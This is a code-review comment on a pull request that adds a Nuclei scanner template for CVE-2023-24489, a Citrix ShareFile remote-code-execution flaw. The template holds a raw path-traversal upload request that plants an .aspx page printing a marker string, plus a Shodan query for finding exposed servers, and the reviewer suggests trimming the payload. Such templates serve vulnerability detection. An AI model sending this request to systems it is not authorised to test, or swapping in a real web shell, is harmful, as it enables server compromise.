http/cves/2023/CVE-2023-24489.yaml

```
@@ -0,0 +1,61 @@
+id: CVE-2023-24489
+
+info:
+  name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution
+  author: DhiyaneshDK,dwisiswanto
+  severity: critical
+  description: |
+    A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-24489
+    - https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-24489
+  metadata:
+    max-request: 1
+    shodan-query: title:"ShareFile Storage Server"
+    verified: true
+  tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz
+
+variables:
+  test_file: '{{rand_base(8)}}'
+
+http:
+  - raw:
+      - |
+        POST /documentum/upload.aspx?parentid={{padding}}&raw=1&unzip=on&uploadid={{test_file}}\..\..\..\cifs&filename={{test_file}}.aspx HTTP/1.1
+        Host: {{Hostname}}
+
+        <%@ Page Language="C#" Debug="true" Trace="false" %>
+        <%@ Import Namespace="System.Diagnostics" %>
+        <%@ Import Namespace="System.IO" %>
+        <script Language="c#" runat="server">
+        void Page_Load(object sender, EventArgs e)
+        {
+            Response.Write("<pre>");
+            Response.Write(Server.HtmlEncode(ExcuteCmd()));
+            Response.Write("</pre>");
+        }
+        string ExcuteCmd()
+        {
+            return "CVE-2023-24489 (Citrix ShareFile RCE)";
+        }
+        </script>
```

`System.Diagnostics` and `System.IO` are not used anywhere.

```suggestion
        POST /documentum/upload.aspx?parentid={{padding}}&raw=1&unzip=on&uploadid={{test_file}}\..\..\..\cifs&filename={{test_file}}.aspx HTTP/1.1
        Host: {{Hostname}}

        <%@ Page Language="C#" Debug="true" Trace="false" %>
        <script Language="c#" runat="server">
        void Page_Load(object sender, EventArgs e)
        {
            Response.Write("{{randstr}}");
        }
        </script>
```